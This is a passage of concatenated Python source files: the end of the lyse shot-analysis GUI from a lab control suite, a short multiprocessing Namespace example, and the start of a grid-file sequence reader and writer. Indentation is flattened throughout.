self.logger = logging.getLogger('lyse.FileBox')
self.logger.info('starting')
loader = UiLoader()
loader.registerCustomWidget(TableView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'filebox.ui'))
self.ui.progressBar_add_shots.hide()
container.addWidget(self.ui)
self.shots_model = DataFrameModel(self.ui.tableView, self.exp_config)
set_auto_scroll_to_end(self.ui.tableView.verticalScrollBar())
self.edit_columns_dialog = EditColumns(self, self.shots_model.column_names, self.shots_model.columns_visible)
self.last_opened_shots_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.connect_signals()
self.analysis_paused = False
self.multishot_required = False
# An Event to let the analysis thread know to check for shots that
# need analysing, rather than using a time.sleep:
self.analysis_pending = threading.Event()
# The folder that the 'add shots' dialog will open to:
self.current_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# A queue for storing incoming files from the ZMQ server so
# the server can keep receiving files even if analysis is slow
# or paused:
self.incoming_queue = queue.Queue()
# Start the thread to handle incoming files, and store them in
# a buffer if processing is paused:
self.incoming = threading.Thread(target=self.incoming_buffer_loop)
self.incoming.daemon = True
self.incoming.start()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.pushButton_edit_columns.clicked.connect(self.on_edit_columns_clicked)
self.shots_model.columns_changed.connect(self.on_columns_changed)
self.ui.toolButton_add_shots.clicked.connect(self.on_add_shot_files_clicked)
self.ui.toolButton_remove_shots.clicked.connect(self.shots_model.on_remove_selection)
self.ui.tableView.doubleLeftClicked.connect(self.shots_model.on_double_click)
self.ui.pushButton_analysis_running.toggled.connect(self.on_analysis_running_toggled)
self.ui.pushButton_mark_as_not_done.clicked.connect(self.on_mark_selection_not_done_clicked)
self.ui.pushButton_run_multishot_analysis.clicked.connect(self.on_run_multishot_analysis_clicked)
def on_edit_columns_clicked(self):
self.edit_columns_dialog.show()
def on_columns_changed(self):
column_names = self.shots_model.column_names
columns_visible = self.shots_model.columns_visible
self.edit_columns_dialog.update_columns(column_names, columns_visible)
def on_add_shot_files_clicked(self):
shot_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if type(shot_files) is tuple:
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(shot_file) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
self.incoming_queue.put(filepath)
def on_analysis_running_toggled(self, pressed):
if pressed:
self.analysis_paused = True
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis paused')
else:
self.analysis_paused = False
self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
self.ui.pushButton_analysis_running.setText('Analysis running')
self.analysis_pending.set()
def on_mark_selection_not_done_clicked(self):
self.shots_model.mark_selection_not_done()
# Let the analysis loop know to look for these shots:
self.analysis_pending.set()
def on_run_multishot_analysis_clicked(self):
self.multishot_required = True
self.analysis_pending.set()
def set_columns_visible(self, columns_visible):
self.shots_model.set_columns_visible(columns_visible)
@inmain_decorator()
def set_add_shots_progress(self, completed, total, message):
self.ui.progressBar_add_shots.setFormat("Adding shots: [{}] %v/%m (%p%)".format(message))
if completed == total and message is None:
self.ui.progressBar_add_shots.hide()
else:
if total is not None:
self.ui.progressBar_add_shots.setMaximum(total)
if completed is not None:
self.ui.progressBar_add_shots.setValue(completed)
if self.ui.progressBar_add_shots.isHidden():
self.ui.progressBar_add_shots.show()
if completed is None and total is None and message is not None:
# Ensure a repaint when only the message changes:
self.ui.progressBar_add_shots.repaint()
def incoming_buffer_loop(self):
"""We use a queue as a buffer for incoming shots. We don't want to hang and not
respond to a client submitting shots, so we just let shots pile up here until we can get to them.
The downside to this is that we can't return errors to the client if the shot cannot be added,
but the suggested workflow is to handle errors here anyway. A client running shots shouldn't stop
the experiment on account of errors from the analyis stage, so what's the point of passing errors to it?
We'll just raise errors here and the user can decide what to do with them."""
logger = logging.getLogger('lyse.FileBox.incoming')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
n_shots_added = 0
while True:
try:
filepaths = []
filepath = self.incoming_queue.get()
filepaths.append(filepath)
if self.incoming_queue.qsize() == 0:
# Wait momentarily in case more arrive so we can batch process them:
time.sleep(0.1)
# Batch process to decrease number of dataframe concatenations:
batch_size = len(self.shots_model.dataframe) // 3 + 1
while True:
try:
filepath = self.incoming_queue.get(False)
except queue.Empty:
break
else:
filepaths.append(filepath)
if len(filepaths) >= batch_size:
break
logger.info('adding:\n%s' % '\n'.join(filepaths))
if n_shots_added == 0:
total_shots = self.incoming_queue.qsize() + len(filepaths)
self.set_add_shots_progress(1, total_shots, "reading shot files")
# Remove duplicates from the list (preserving order) in case the
# client sent the same filepath multiple times:
filepaths = sorted(set(filepaths), key=filepaths.index) # Inefficient but readable
# We open the HDF5 files here outside the GUI thread so as not to hang the GUI:
dataframes = []
indices_of_files_not_found = []
for i, filepath in enumerate(filepaths):
try:
dataframe = get_dataframe_from_shot(filepath)
dataframes.append(dataframe)
except IOError:
app.output_box.output('Warning: Ignoring shot file not found or not readable %s\n' % filepath, red=True)
indices_of_files_not_found.append(i)
n_shots_added += 1
shots_remaining = self.incoming_queue.qsize()
total_shots = n_shots_added + shots_remaining + len(filepaths) - (i + 1)
self.set_add_shots_progress(n_shots_added, total_shots, "reading shot files")
self.set_add_shots_progress(n_shots_added, total_shots, "concatenating dataframes")
if dataframes:
new_row_data = concat_with_padding(*dataframes)
else:
new_row_data = None
# Do not add the shots that were not found on disk. Reverse
# loop so that removing an item doesn't change the indices of
# subsequent removals:
for i in reversed(indices_of_files_not_found):
del filepaths[i]
if filepaths:
self.shots_model.add_files(filepaths, new_row_data)
# Let the analysis loop know to look for new shots:
self.analysis_pending.set()
if shots_remaining == 0:
self.set_add_shots_progress(n_shots_added, total_shots, None)
n_shots_added = 0 # reset our counter for the next batch
except Exception:
# Keep this incoming loop running at all costs, but make the
# otherwise uncaught exception visible to the user:
zprocess.raise_exception_in_thread(sys.exc_info())
def analysis_loop(self):
logger = logging.getLogger('lyse.FileBox.analysis_loop')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
while True:
try:
self.analysis_pending.wait()
self.analysis_pending.clear()
at_least_one_shot_analysed = False
while True:
if not self.analysis_paused:
# Find the first shot that has not finished being analysed:
filepath = self.shots_model.get_first_incomplete()
if filepath is not None:
logger.info('analysing: %s'%filepath)
self.do_singleshot_analysis(filepath)
at_least_one_shot_analysed = True
if filepath is None and at_least_one_shot_analysed:
self.multishot_required = True
if filepath is None:
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
else:
logger.info('analysis is paused')
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
except Exception:
etype, value, tb = sys.exc_info()
orig_exception = ''.join(traceback.format_exception_only(etype, value))
message = ('Analysis loop encountered unexpected exception. ' +
'This is a bug and should be reported. The analysis ' +
'loop is continuing, but lyse may be in an inconsistent state. '
'Restart lyse, or continue at your own risk. '
'Original exception was:\n\n' + orig_exception)
# Raise the exception in a thread so we can keep running
zprocess.raise_exception_in_thread((RuntimeError, RuntimeError(message), tb))
self.pause_analysis()
@inmain_decorator()
def pause_analysis(self):
# This automatically triggers the slot that sets self.analysis_paused
self.ui.pushButton_analysis_running.setChecked(True)
def do_singleshot_analysis(self, filepath):
# Check the shot file exists before sending it to the singleshot
# routinebox. This does not guarantee it won't have been deleted by
# the time the routinebox starts running analysis on it, but by
# detecting it now we can most of the time avoid the user code
# coughing exceptions due to the file not existing. Which would also
# not be a problem, but this way we avoid polluting the outputbox with
# more errors than necessary.
if not os.path.exists(filepath):
self.shots_model.mark_as_deleted_off_disk(filepath)
return
self.to_singleshot.put(filepath)
while True:
signal, status_percent, updated_data = self.from_singleshot.get()
for file in updated_data:
# Update the data for all the rows with new data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
# Update the status percent for the the row on which analysis is actually running:
self.shots_model.update_row(filepath, status_percent=status_percent, dataframe_already_updated=True)
if signal == 'done':
return
if signal == 'error':
if not os.path.exists(filepath):
# Do not pause if the file has been deleted. An error is
# no surprise there:
self.shots_model.mark_as_deleted_off_disk(filepath)
else:
self.pause_analysis()
return
if signal == 'progress':
continue
raise ValueError('invalid signal %s' % str(signal))
def do_multishot_analysis(self):
self.to_multishot.put(None)
while True:
signal, _, updated_data = self.from_multishot.get()
for file in updated_data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
if signal == 'done':
self.multishot_required = False
return
elif signal == 'error':
self.pause_analysis()
return
class Lyse(object):
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'main.ui'), LyseMainWindow())
self.connect_signals()
self.setup_config()
self.port = int(self.exp_config.get('ports', 'lyse'))
# The singleshot routinebox will be connected to the filebox
# by queues:
to_singleshot = queue.Queue()
from_singleshot = queue.Queue()
# So will the multishot routinebox:
to_multishot = queue.Queue()
from_multishot = queue.Queue()
self.output_box = OutputBox(self.ui.verticalLayout_output_box)
self.singleshot_routinebox = RoutineBox(self.ui.verticalLayout_singleshot_routinebox, self.exp_config,
self, to_singleshot, from_singleshot, self.output_box.port)
self.multishot_routinebox = RoutineBox(self.ui.verticalLayout_multishot_routinebox, self.exp_config,
self, to_multishot, from_multishot, self.output_box.port, multishot=True)
self.filebox = FileBox(self.ui.verticalLayout_filebox, self.exp_config,
to_singleshot, from_singleshot, to_multishot, from_multishot)
self.last_save_config_file = None
self.last_save_data = None
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionSave_dataframe_as.triggered.connect(lambda: self.on_save_dataframe_triggered(True))
self.ui.actionSave_dataframe.triggered.connect(lambda: self.on_save_dataframe_triggered(False))
self.ui.actionLoad_dataframe.triggered.connect(self.on_load_dataframe_triggered)
self.ui.resize(1600, 900)
# Set the splitters to appropriate fractions of their maximum size:
self.ui.splitter_horizontal.setSizes([1000, 600])
self.ui.splitter_vertical.setSizes([300, 600])
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('lyse', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file, restore_window_geometry)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Load the window geometry now, but then defer the other loading until 50ms
# after the window has shown, so that the GUI pops up faster in the meantime.
try:
self.load_window_geometry_configuration(autoload_config_file)
except Exception:
# ignore error for now and let it be raised again in the call to load_configuration:
restore_window_geometry = True
else:
# Success - skip loading window geometry in load_configuration:
restore_window_geometry = False
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
# self.ui.showMaximized()
def terminate_all_workers(self):
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.end_child()
def workers_terminated(self):
terminated = {}
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.worker.poll()
terminated[routine.filepath] = routine.worker.returncode is not None
return terminated
def are_you_sure(self):
message = ('Current configuration (which scripts are loaded and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
return True
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
if self.only_window_geometry_is_different(save_data, self.last_save_data):
self.save_configuration(self.last_save_config_file)
self.terminate_all_workers()
return True
elif not self.are_you_sure():
return False
self.terminate_all_workers()
return True
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
try:
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
except LabConfig.NoOptionError:
self.exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
if not os.path.exists(default_path):
os.makedirs(default_path)
default = os.path.join(default_path, 'lyse.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current lyse configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def only_window_geometry_is_different(self, current_data, old_data):
ui_keys = ['window_size', 'window_pos', 'splitter', 'splitter_vertical', 'splitter_horizontal']
compare = [current_data[key] == old_data[key] for key in current_data.keys() if key not in ui_keys]
return all(compare)
def get_save_data(self):
save_data = {}
box = self.singleshot_routinebox
save_data['SingleShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastSingleShotFolder'] = box.last_opened_routine_folder
box = self.multishot_routinebox
save_data['MultiShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastMultiShotFolder'] = box.last_opened_routine_folder
save_data['LastFileBoxFolder'] = self.filebox.last_opened_shots_folder
save_data['analysis_paused'] = self.filebox.analysis_paused
window_size = self.ui.size()
save_data['window_size'] = (window_size.width(), window_size.height())
window_pos = self.ui.pos()
save_data['window_pos'] = (window_pos.x(), window_pos.y())
save_data['screen_geometry'] = get_screen_geometry()
save_data['splitter'] = self.ui.splitter.sizes()
save_data['splitter_vertical'] = self.ui.splitter_vertical.sizes()
save_data['splitter_horizontal'] = self.ui.splitter_horizontal.sizes()
return save_data
def save_configuration(self, save_file):
lyse_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
lyse_config.set('lyse_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'lyse.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select lyse configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename, restore_window_geometry=True):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s' % filename)
lyse_config = LabConfig(filename)
try:
self.singleshot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'SingleShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.singleshot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastSingleShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'MultiShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastMultiShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.filebox.last_opened_shots_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastFileBoxFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
if ast.literal_eval(lyse_config.get('lyse_state', 'analysis_paused')):
self.filebox.pause_analysis()
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
if restore_window_geometry:
self.load_window_geometry_configuration(filename)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def load_window_geometry_configuration(self, filename):
"""Load only the window geometry from the config file. It's useful to have this
separate from the rest of load_configuration so that it can be called before the
window is shown."""
lyse_config = LabConfig(filename)
try:
screen_geometry = ast.literal_eval(lyse_config.get('lyse_state', 'screen_geometry'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
else:
# Only restore the window size and position, and splitter
# positions if the screen is the same size/same number of monitors
# etc. This prevents the window moving off the screen if say, the
# position was saved when 2 monitors were plugged in but there is
# only one now, and the splitters may not make sense in light of a
# different window size, so better to fall back to defaults:
current_screen_geometry = get_screen_geometry()
if current_screen_geometry == screen_geometry:
try:
self.ui.resize(*ast.literal_eval(lyse_config.get('lyse_state', 'window_size')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.move(*ast.literal_eval(lyse_config.get('lyse_state', 'window_pos')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_vertical.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_vertical')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_horizontal.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_horizontal')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
"hdf5_viewer",
"hdf5_viewer_arguments"],
"paths": ["shared_drive",
"experiment_shot_storage",
"analysislib"],
"ports": ["lyse"]
}
self.exp_config = LabConfig(required_params=required_config_params)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
# Keyboard shortcuts:
QtWidgets.QShortcut('Del', self.ui, lambda: self.delete_items(True))
QtWidgets.QShortcut('Shift+Del', self.ui, lambda: self.delete_items(False))
def on_save_dataframe_triggered(self, choose_folder=True):
df = self.filebox.shots_model.dataframe.copy()
if len(df) > 0:
default = self.exp_config.get('paths', 'experiment_shot_storage')
if choose_folder:
save_path = QtWidgets.QFileDialog.getExistingDirectory(self.ui, 'Select a Folder for the Dataframes', default)
if type(save_path) is tuple:
save_path, _ = save_path
if not save_path:
# User cancelled
return
sequences = df.sequence.unique()
for sequence in sequences:
sequence_df = pandas.DataFrame(df[df['sequence'] == sequence], columns=df.columns).dropna(axis=1, how='all')
labscript = sequence_df['labscript'].iloc[0]
filename = "dataframe_{}_{}.msg".format(sequence.to_pydatetime().strftime("%Y%m%dT%H%M%S"),labscript[:-3])
if not choose_folder:
save_path = os.path.dirname(sequence_df['filepath'].iloc[0])
sequence_df.infer_objects()
for col in sequence_df.columns :
if sequence_df[col].dtype == object:
sequence_df[col] = pandas.to_numeric(sequence_df[col], errors='ignore')
sequence_df.to_msgpack(os.path.join(save_path, filename))
else:
error_dialog('Dataframe is empty')
def on_load_dataframe_triggered(self):
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'dataframe.msg')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select dataframe file to load',
default,
"dataframe files (*.msg)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
df = pandas.read_msgpack(file).sort_values("run time").reset_index()
# Check for changes in the shot files since the dataframe was exported
def changed_since(filepath, time):
if os.path.isfile(filepath):
return os.path.getmtime(filepath) > time
else:
return False
filepaths = df["filepath"].tolist()
changetime_cache = os.path.getmtime(file)
need_updating = np.where(map(lambda x: changed_since(x, changetime_cache), filepaths))[0]
need_updating = np.sort(need_updating)[::-1] # sort in descending order to not remove the wrong items with pop
# Reload the files where changes where made since exporting
for index in need_updating:
filepath = filepaths.pop(index)
self.filebox.incoming_queue.put(filepath)
df = df.drop(need_updating)
self.filebox.shots_model.add_files(filepaths, df, done=True)
def delete_items(self, confirm):
"""Delete items from whichever box has focus, with optional confirmation
dialog"""
if self.filebox.ui.tableView.hasFocus():
self.filebox.shots_model.remove_selection(confirm)
if self.singleshot_routinebox.ui.treeView.hasFocus():
self.singleshot_routinebox.remove_selection(confirm)
if self.multishot_routinebox.ui.treeView.hasFocus():
self.multishot_routinebox.remove_selection(confirm)
if __name__ == "__main__":
logger = setup_logging('lyse')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = QtWidgets.QApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = Lyse()
# Start the web server:
splash.update_text('starting analysis server')
server = WebServer(app.port)
splash.update_text('done')
# Let the interpreter run every 500ms so it sees Ctrl-C interrupts:
timer = QtCore.QTimer()
timer.start(500)
timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
# Upon seeing a ctrl-c interrupt, quit the event loop
signal.signal(signal.SIGINT, lambda *args: qapplication.exit())
splash.hide()
qapplication.exec_()
server.shutdown()
|
manager.py | import multiprocessing
def task(ns):
print(ns.x) # print 1
ns.x = 2
def main():
manager = multiprocessing.Manager()
ns = manager.Namespace()
ns.x = 1
print(ns) # Namespace(x=1)
process = multiprocessing.Process(target=task, args=(ns, ))
process.start()
process.join() # print 1
print(ns) # Namespace(x=2)
if __name__ == '__main__':
main()
|
GridFileSequence.py | # This file contain GridFileSquence class which create grid for squence of frame
import numpy as np
import struct
import threading
import time
import multiprocessing
import os
from stats import StatRecord
from Grid import *
from RasterGrid import RasterGrid
from primitives import Vector2
from ThreadRasterization import *
import Kernels
import Signals
THREAD_COUNT = 1#max( 1, multiprocessing.cpu_count() / 2 )
##THREAD_COUNT = multiprocessing.cpu_count() - 1
# the thread that does the file output
def threadOutput( outFile, buffer, bufferLock, startTime, gfs ):
"""Reads grids from the buffer and writes them to the output file"""
nextGrid = 0
while ( buffer or gfs.activeThreadCount ):
# keep doing the work as long as the buffer has contents or there are active raster threads
bufferLock.acquire()
try:
i = buffer.index( nextGrid )
bg = buffer.pop( i )
bufferLock.release()
if ( nextGrid & 0xFF == 0 ):
print "\t\tWriting buffer %d at time %f s" % ( nextGrid, time.clock() - startTime )
outFile.write( bg.grid.binaryString() )
nextGrid += 1
except ValueError:
bufferLock.release()
time.sleep( 1.0 )
print "\t\tLast grid %d at time %f s" % ( nextGrid - 1, time.clock() - startTime )
class RasterReport:
"""Simple class to return the results of rasterization"""
def __init__( self ):
self.maxVal = 0.0
self.minVal = 1e6
self.count = 0
def incCount( self ):
self.count += 1
def setMax( self, val ):
if ( val > self.maxVal ):
self.maxVal = val
def setMin( self, val ):
if ( val < self.minVal ):
self.minVal = val
# A mapping of numpy array type to an int iterator for storing in the file
NP_TYPES = ( np.float32, np.float64, np.int8, np.int16, np.int32, np.int64 )
TYPE_ID_MAP = dict( map( lambda x: ( x[1], x[0] ), enumerate( NP_TYPES ) ) )
class GridFileSequenceReader:
'''A simple class for reading and iterating through a GridFileSequence'''
def __init__( self, fileName, startGrid=0, maxGrids=-1, gridStep=1 ):
'''Initializes the reader to a particular file.
@param fileName A string. The path to a grid file sequence file.
@param startGrid An int. The first grid to return in the sequence.
(Defaults to 0, the first grid.)
@param maxGrids An int. The maximum number of grids to iterate through.
If negative, all grids in the file will be used. If
non-negative, it iterates through min( maxGrids, count).
@param gridStep An int. The stride between accessible grids.
The default is 1 (every grid.)
@raises IOError if the file doesn't exist.
'''
self.file = open( fileName, 'rb' )
# read the header
self.readHeader()
self.currGridID = 0
self.startGrid = startGrid
if ( maxGrids == -1 ):
self.maxGrids = self.count
else:
self.maxGrids = min( self.count, self.maxGrids )
assert( gridStep > 0 )
self.gridStride = self.gridSize() * ( gridStep - 1 )
self.currGrid = DataGrid( self.corner, self.size, ( self.w, self.h ), arrayType=self.arrayType, leaveEmpty=True )
self.activeThreadCount = 0
def __str__( self ):
return self.summary()
def getCellSize( self ):
'''Reports the cellsize of the grid.
@returns A 2-tuple of floats. The cell size in the x- and y-directions.'''
return ( self.size[0] / self.w, self.size[1] / self.h )
def summary( self ):
'''Produces a string which summarizes the sequence'''
s = "Grid file sequence"
s += "\n\tMinimum corner: (%.2f, %.2f)" % ( self.corner[0], self.corner[1] )
s += '\n\tSize: (%.2f, %.2f)' % ( self.size[0], self.size[1] )
s += '\n\tResolution: (%d, %d )' % ( self.w, self.h )
s += '\n\tGrid count: %d' % self.count
s += '\n\tData type: %s' % str( self.arrayType )
s += '\n\tData range: (%s, %s)' % ( str( self.range[0] ), str( self.range[1] ) )
return s
def readHeader( self ):
'''Reads the header of the open file.'''
corner = struct.unpack( 'ff', self.file.read( 8 ) )
self.corner = Vector2( corner[0], corner[1] )
size = struct.unpack( 'ff', self.file.read( 8 ) )
self.size = Vector2( size[0], size[1] )
self.w, self.h = struct.unpack( 'ii', self.file.read( 8 ) )
self.arrayType = np.dtype( NP_TYPES[ struct.unpack( 'i', self.file.read( 4 ) )[0] ] )
self.count = struct.unpack( 'i', self.file.read( 4 ) )[0]
self.range = struct.unpack( self.arrayType.char * 2, self.file.read( self.arrayType.itemsize * 2 ) )
self.headerSize = 32 + self.arrayType.itemsize * 2
def gridSize( self ):
'''Returns the size of a grid in bytes.capitalize
@returns The number of bytes in a single frame
'''
return self.w * self.h * 4
def gridCount( self ):
'''Returns the number of grids in the sequence.
@returns An int. The number of grids (not in the file, but the number
to be iterated across accounting for startGrid, maxGrids and gridStep.'''
return self.maxGrids
def __iter__( self ):
'''Returns an iterator to the grids (it is itself).
The iterator continues from the current state of the reader. I.e. if it is currently on
frame 5, the iterator will start on frame 5. It is the responsibility of the caller to
call setNext(0) on the sequence before using it as an interable if the caller wants to
iterate over all values.
'''
return self
def setNext( self, gridID ):
'''Sets the reader so that the grid returned on the next invocaiton of "next" is gridID.
@param gridID An int. The index of the next next grid. Should be in the range [0, self.count ).
'''
assert( gridID >= 0 and gridID <= self.maxGrids )
if ( gridID > self.maxGrids ):
self.currGridID = self.maxGrids
else:
self.currGridID = gridID - 1
size = self.gridSize()
byteAddr = self.headerSize + ( self.startGrid + gridID ) * size + ( gridID * self.gridStride )
self.file.seek( byteAddr, 0 )
def next( self ):
'''Returns the next frame in the sequence.
@returns A 2-tuple ( grid, gridID ). It returns a numpy array consisting of the
grid (with shape ( self.w, self.h )) and the index of that grid. The
index value is with respect to the stride and starting grid.
@raises StopIteration when there are no more grids.
'''
if ( self.currGridID + 1 >= self.maxGrids ):
raise StopIteration
dataCount = self.w * self.h
try:
self.currGrid.cells[:, :] = np.reshape( np.fromstring( self.file.read( self.gridSize() ), self.arrayType, dataCount), ( self.w, self.h ) )
except ValueError:
raise StopIteration
self.currGridID += 1
if ( self.gridStride ):
self.file.seek( self.gridStride, 1 ) # 1 = seek offset from current position
return self.currGrid, self.currGridID
@property
def domain( self ):
'''Returns the domain of the GridFileSequence data.
@returns An instance of Grid.AbstractGrid.
'''
return AbstractGrid( self.corner, self.size, ( self.w, self.h ) )
class GridFileSequence:
"""Creates a grid sequence from a frame file and streams the resulting grids to
a file"""
# different ways of visualizing speed
BLIT_SPEED = 0 # simply blit the agent to the cell center with his speed
NORM_SPEED = 1 # distribute speed with a normalized gaussian
UNNORM_SPEED = 2 # distribute speed with an unnormalized gaussian
NORM_DENSE_SPEED = 3 # distribute speed with normalized gaussian and then divide by the density
